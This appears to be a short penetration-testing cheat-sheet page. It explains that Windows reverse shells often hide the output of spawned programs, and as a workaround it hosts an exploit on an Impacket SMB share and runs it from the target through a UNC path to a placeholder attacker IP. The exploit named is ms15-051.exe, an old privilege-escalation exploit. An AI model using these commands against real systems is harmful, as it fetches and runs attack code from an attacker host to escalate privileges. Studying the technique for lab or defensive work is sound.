# SMB Share Execution for Exploit Output

{% hint style="info" %}

* <mark style="color:purple;">Windows reverse shells often fail to redirect child process</mark> <mark style="color:orange;">**`stdout/stderr`**</mark> <mark style="color:purple;">to the network socket, so output from spawned binaries isn't visible.</mark>
* <mark style="color:orange;">**`SMB`**</mark> <mark style="color:purple;">execution works because the protocol handles remote process</mark> <mark style="color:orange;">**`I/O`**</mark> <mark style="color:purple;">correctly, making output visible.</mark>&#x20;
  {% endhint %}

{% stepper %}
{% step %} <mark style="color:red;">**`Host the Exploit on SMB Share`**</mark>

{% code title="Start a share on the same directory where the exploit is " overflow="wrap" %}

```shellscript
sudo smbserver.py share . -smb2support
```

{% endcode %}
{% endstep %}

{% step %} <mark style="color:red;">**`Execute from Target via UNC Path`**</mark>

```powershell
\\<ATTACKER_IP>\share\ms15-051.exe "whoami"
```

{% endstep %}
{% endstepper %}